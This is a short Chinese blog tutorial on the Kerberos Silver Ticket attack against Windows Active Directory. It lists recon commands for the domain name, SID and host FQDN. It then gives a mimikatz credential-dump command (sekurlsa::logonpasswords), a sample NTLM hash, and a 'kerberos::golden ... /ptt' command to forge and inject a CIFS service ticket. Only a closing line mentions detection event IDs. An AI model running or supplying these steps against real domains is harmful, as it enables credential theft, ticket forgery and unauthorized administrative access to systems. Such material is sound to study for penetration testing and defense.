本文已参与「新人创作礼」活动,一起开启掘金创作之路。
白银票据
1、原理 黄金票据是伪造TGT(门票发放票),而白银票据则是伪造ST(门票),这样的好处是门票不会经过KDC,从而更加隐蔽,但是伪造的门票只对部分服务起作用,如cifs(文件共享服务),mssql,winrm(windows远程管理),DNS等等
利用前提:
拿到目标机器hash(是目标机,不一定是域控)
条件要求:
域名
域sid
目标服务器FQDN
可利用的服务
服务账号的NTML HASH
需要伪造的用户名
2、利用
(1)信息收集
1、获取域名
whoami
net time /domain
ipconfig /all
1
2
3
2、获取SID
whoami /all
1
3、目标机器的FQDN
net time /domain
就是hostname+域名 /target:\WIN-75NA0949GFB.NOONE.com
1
2
4、可利用的服务CIFS(磁盘共享的服务)
/service:CIFS
1
5、要伪造的用户名
/user:Administrator
1
6、服务账号的ntlm hash(Primary Username : WIN-75NA0949GFB的hash,不是admin的)
/rc4:08d93ddf15a6309a46daaa7ec8565296
#生成了mimikatz.log文件(域控主机执行)
1
2
7、利用文件共享服务cifs,获取服务账号得NTMLhash值(在14068基础上使用mimikatz获取)
注意:服务账号就是域控名$
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> 2.txt
1
(2)伪造ST
1、清除所有票据
klist purge
1
2、使用mimikatz伪造指定用户的票据并注入到内存
kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服务账号NTMLHASH /user:用户名 /ptt
简单了解黄金票据和白银票据:
黄金票据:是直接抓取域控中ktbtgt账号的hash,来在client端生成一个TGT票据,那么该票据是针对所有机器的所有服务。
白银票据:实际就是在抓取到了域控服务hash的情况下,在client端以一个普通域用户的身份生成TGS票据,并且是针对于某个机器上的某个服务的,生成的白银票据,只能访问指定的target机器中指定的服务。
Golden Ticket 和Silver Ticket都会在日志,不同的是,Golden Ticket会在域控中留下日志,Silver Ticket 仅在目标系统留下日志,因为Silver Ticket 不与KDC产生交互
产生的日志中,应该关注事件ID 4624(账户登录)、4634(账户注销)、4672(管理员登录),并且域字段应该为Domain 时为空
